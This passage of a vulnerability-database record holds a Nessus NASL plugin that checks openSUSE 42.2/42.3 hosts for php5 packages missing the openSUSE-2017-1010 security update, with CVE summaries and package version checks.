["CVE-2016-10397", "CVE-2016-5766", "CVE-2017-11143", "CVE-2017-11144", "CVE-2017-11145", "CVE-2017-11146", "CVE-2017-11147", "CVE-2017-11628", "CVE-2017-7890"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:apache2-mod_php5", "p-cpe:/a:novell:opensuse:apache2-mod_php5-debuginfo", "p-cpe:/a:novell:opensuse:php5", "p-cpe:/a:novell:opensuse:php5-bcmath", "p-cpe:/a:novell:opensuse:php5-bcmath-debuginfo", "p-cpe:/a:novell:opensuse:php5-bz2", "p-cpe:/a:novell:opensuse:php5-fastcgi-debuginfo", "p-cpe:/a:novell:opensuse:php5-bz2-debuginfo", "p-cpe:/a:novell:opensuse:php5-calendar", "p-cpe:/a:novell:opensuse:php5-calendar-debuginfo", "p-cpe:/a:novell:opensuse:php5-fileinfo", "p-cpe:/a:novell:opensuse:php5-ctype", "p-cpe:/a:novell:opensuse:php5-fileinfo-debuginfo", "p-cpe:/a:novell:opensuse:php5-ctype-debuginfo", "p-cpe:/a:novell:opensuse:php5-curl", "p-cpe:/a:novell:opensuse:php5-firebird", "p-cpe:/a:novell:opensuse:php5-curl-debuginfo", "p-cpe:/a:novell:opensuse:php5-dba", "p-cpe:/a:novell:opensuse:php5-dba-debuginfo", "p-cpe:/a:novell:opensuse:php5-debuginfo", "p-cpe:/a:novell:opensuse:php5-debugsource", "p-cpe:/a:novell:opensuse:php5-firebird-debuginfo", "p-cpe:/a:novell:opensuse:php5-devel", "p-cpe:/a:novell:opensuse:php5-dom", "p-cpe:/a:novell:opensuse:php5-fpm", "p-cpe:/a:novell:opensuse:php5-fpm-debuginfo", "p-cpe:/a:novell:opensuse:php5-dom-debuginfo", "p-cpe:/a:novell:opensuse:php5-ftp", "p-cpe:/a:novell:opensuse:php5-enchant", "p-cpe:/a:novell:opensuse:php5-enchant-debuginfo", "p-cpe:/a:novell:opensuse:php5-exif", "p-cpe:/a:novell:opensuse:php5-exif-debuginfo", "p-cpe:/a:novell:opensuse:php5-fastcgi", "p-cpe:/a:novell:opensuse:php5-mbstring", "p-cpe:/a:novell:opensuse:php5-mbstring-debuginfo", "p-cpe:/a:novell:opensuse:php5-mcrypt", "p-cpe:/a:novell:opensuse:php5-mcrypt-debuginfo", "p-cpe:/a:novell:opensuse:php5-mssql", "p-cpe:/a:novell:opensuse:php5-mssql-debuginfo", "p-cpe:/a:novell:opensuse:php5-mysql", "p-cpe:/a:novell:opensuse:php5-mysql-debuginfo", "p-cpe:/a:novell:opensuse:php5-odbc", "p-cpe:/a:novell:opensuse:php5-odbc-debuginfo", "p-cpe:/a:novell:opensuse:php5-opcache", "p-cpe:/a:novell:opensuse:php5-opcache-debuginfo", "p-cpe:/a:novell:opensuse:php5-openssl", "p-cpe:/a:novell:opensuse:php5-openssl-debuginfo", "p-cpe:/a:novell:opensuse:php5-pcntl", "p-cpe:/a:novell:opensuse:php5-ftp-debuginfo", "p-cpe:/a:novell:opensuse:php5-pcntl-debuginfo", "p-cpe:/a:novell:opensuse:php5-pdo", "p-cpe:/a:novell:opensuse:php5-gd", "p-cpe:/a:novell:opensuse:php5-pdo-debuginfo", "p-cpe:/a:novell:opensuse:php5-gd-debuginfo", "p-cpe:/a:novell:opensuse:php5-pear", "p-cpe:/a:novell:opensuse:php5-gettext", "p-cpe:/a:novell:opensuse:php5-pgsql", "p-cpe:/a:novell:opensuse:php5-pgsql-debuginfo", "p-cpe:/a:novell:opensuse:php5-gettext-debuginfo", "p-cpe:/a:novell:opensuse:php5-phar", "p-cpe:/a:novell:opensuse:php5-phar-debuginfo", "p-cpe:/a:novell:opensuse:php5-posix", "p-cpe:/a:novell:opensuse:php5-posix-debuginfo", "p-cpe:/a:novell:opensuse:php5-pspell", "p-cpe:/a:novell:opensuse:php5-pspell-debuginfo", "p-cpe:/a:novell:opensuse:php5-readline", "p-cpe:/a:novell:opensuse:php5-readline-debuginfo", "p-cpe:/a:novell:opensuse:php5-shmop", "p-cpe:/a:novell:opensuse:php5-shmop-debuginfo", "p-cpe:/a:novell:opensuse:php5-gmp", "p-cpe:/a:novell:opensuse:php5-snmp", "p-cpe:/a:novell:opensuse:php5-snmp-debuginfo", "p-cpe:/a:novell:opensuse:php5-gmp-debuginfo", "p-cpe:/a:novell:opensuse:php5-soap", "p-cpe:/a:novell:opensuse:php5-iconv", "p-cpe:/a:novell:opensuse:php5-soap-debuginfo", "p-cpe:/a:novell:opensuse:php5-iconv-debuginfo", "p-cpe:/a:novell:opensuse:php5-sockets", "p-cpe:/a:novell:opensuse:php5-imap", "p-cpe:/a:novell:opensuse:php5-sockets-debuginfo", "p-cpe:/a:novell:opensuse:php5-sqlite", "p-cpe:/a:novell:opensuse:php5-imap-debuginfo", "p-cpe:/a:novell:opensuse:php5-sqlite-debuginfo", "p-cpe:/a:novell:opensuse:php5-intl", "p-cpe:/a:novell:opensuse:php5-suhosin", "p-cpe:/a:novell:opensuse:php5-suhosin-debuginfo", "p-cpe:/a:novell:opensuse:php5-intl-debuginfo", "p-cpe:/a:novell:opensuse:php5-sysvmsg", "p-cpe:/a:novell:opensuse:php5-json", "p-cpe:/a:novell:opensuse:php5-sysvmsg-debuginfo", "p-cpe:/a:novell:opensuse:php5-sysvsem", "p-cpe:/a:novell:opensuse:php5-sysvsem-debuginfo", "p-cpe:/a:novell:opensuse:php5-json-debuginfo", "p-cpe:/a:novell:opensuse:php5-sysvshm", "p-cpe:/a:novell:opensuse:php5-ldap", "p-cpe:/a:novell:opensuse:php5-sysvshm-debuginfo", "p-cpe:/a:novell:opensuse:php5-ldap-debuginfo", "p-cpe:/a:novell:opensuse:php5-tidy", "p-cpe:/a:novell:opensuse:php5-tidy-debuginfo", "p-cpe:/a:novell:opensuse:php5-tokenizer", "p-cpe:/a:novell:opensuse:php5-tokenizer-debuginfo", "p-cpe:/a:novell:opensuse:php5-wddx", "p-cpe:/a:novell:opensuse:php5-wddx-debuginfo", "p-cpe:/a:novell:opensuse:php5-xmlreader", "p-cpe:/a:novell:opensuse:php5-xmlreader-debuginfo", "p-cpe:/a:novell:opensuse:php5-xmlrpc", "p-cpe:/a:novell:opensuse:php5-xmlrpc-debuginfo", "p-cpe:/a:novell:opensuse:php5-xmlwriter", "p-cpe:/a:novell:opensuse:php5-xmlwriter-debuginfo", "p-cpe:/a:novell:opensuse:php5-xsl", "p-cpe:/a:novell:opensuse:php5-xsl-debuginfo", "p-cpe:/a:novell:opensuse:php5-zip", "p-cpe:/a:novell:opensuse:php5-zip-debuginfo", "p-cpe:/a:novell:opensuse:php5-zlib", "p-cpe:/a:novell:opensuse:php5-zlib-debuginfo", "cpe:/o:novell:opensuse:42.2", "cpe:/o:novell:opensuse:42.3"], "id": "OPENSUSE-2017-1010.NASL", "href": "https://www.tenable.com/plugins/nessus/102966", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-1010.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(102966);\n script_version(\"3.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-10397\", \"CVE-2016-5766\", \"CVE-2017-11143\", \"CVE-2017-11144\", \"CVE-2017-11145\", \"CVE-2017-11146\", \"CVE-2017-11147\", \"CVE-2017-11628\", \"CVE-2017-7890\");\n\n script_name(english:\"openSUSE Security Update : php5 (openSUSE-2017-1010)\");\n script_summary(english:\"Check for the openSUSE-2017-1010 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for php5 fixes the following issues :\n\n - CVE-2016-10397: parse_url() can be bypassed to return\n fake host. (bsc#1047454)\n\n - CVE-2017-11143: An invalid free in the WDDX\n deserialization of booleanparameters could be used by\n attackers able to inject XML for deserialization tocrash\n the PHP interpreter. (bsc#1048097)\n\n - CVE-2017-11144: The opensslextension PEM sealing code\n did not check the return value of the OpenSSL\n sealingfunction, which could lead to a crash.\n (bsc#1048096)\n\n - CVE-2017-11145: Lack of bounds checks in\n timelib_meridian coud lead to information leak.\n (bsc#1048112)\n\n - CVE-2017-11146: Lack of bounds checks in\n timelib_meridian parse code could lead to information\n leak. (bsc#1048111)\n\n - CVE-2017-11147: The PHAR archive handler could beused by\n attackers supplying malicious archive files to crash the\n PHP interpreteror potentially disclose information.\n (bsc#1048094)\n\n - CVE-2016-5766: Integer Overflow in _gd2GetHeader()\n resulting could lead to heap overflow (bsc#986386)\n\n - CVE-2017-11628: Stack-base dbuffer overflow in\n zend_ini_do_op() in Zend/zend_ini_parser.c (bsc#1050726)\n\n - CVE-2017-7890: Buffer over-read from uninitialized data\n in gdImageCreateFromGifCtx function could lead to denial\n of service (bsc#1050241)\n\nThis update was imported from the SUSE:SLE-12:Update update project.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1047454\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1048094\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1048096\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1048097\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1048111\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1048112\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1050241\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1050726\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=986386\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php5 packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-mod_php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-mod_php5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-bcmath-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-bz2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-bz2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-calendar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-calendar-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ctype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ctype-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-curl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-dba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-dom\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-dom-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-enchant\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-enchant-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-exif\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-exif-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fastcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fastcgi-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fileinfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fileinfo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-firebird\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-firebird-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fpm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ftp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ftp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gettext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gettext-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gmp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-iconv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-iconv-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-imap-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-intl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-json-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ldap-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mbstring-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mcrypt-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mssql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mssql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mysql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-odbc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-opcache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-opcache-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-openssl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pcntl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pcntl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pdo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pgsql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-phar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-phar-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-posix\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-posix-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pspell-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-readline\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-readline-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-shmop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-shmop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-snmp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-soap-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sockets\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sockets-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sqlite-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-suhosin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-suhosin-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvmsg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvmsg-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvsem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvsem-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvshm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvshm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-tidy-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-tokenizer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-tokenizer-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-wddx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-wddx-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlreader\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlreader-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlrpc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlwriter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlwriter-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xsl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-zip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-zip-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-zlib-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.2|SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.2 / 42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.2\", reference:\"apache2-mod_php5-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"apache2-mod_php5-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-bcmath-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-bcmath-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-bz2-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-bz2-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-calendar-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-calendar-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-ctype-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-ctype-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-curl-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-curl-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-dba-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-dba-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-debugsource-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-devel-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-dom-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-dom-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-enchant-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-enchant-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-exif-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-exif-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-fastcgi-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-fastcgi-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-fileinfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-fileinfo-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-firebird-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-firebird-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-fpm-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-fpm-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-ftp-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-ftp-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-gd-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-gd-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-gettext-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-gettext-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-gmp-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-gmp-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-iconv-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-iconv-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-imap-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-imap-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-intl-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-intl-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-json-5.5.14-77.9.1\") ) flag++;\nif ( 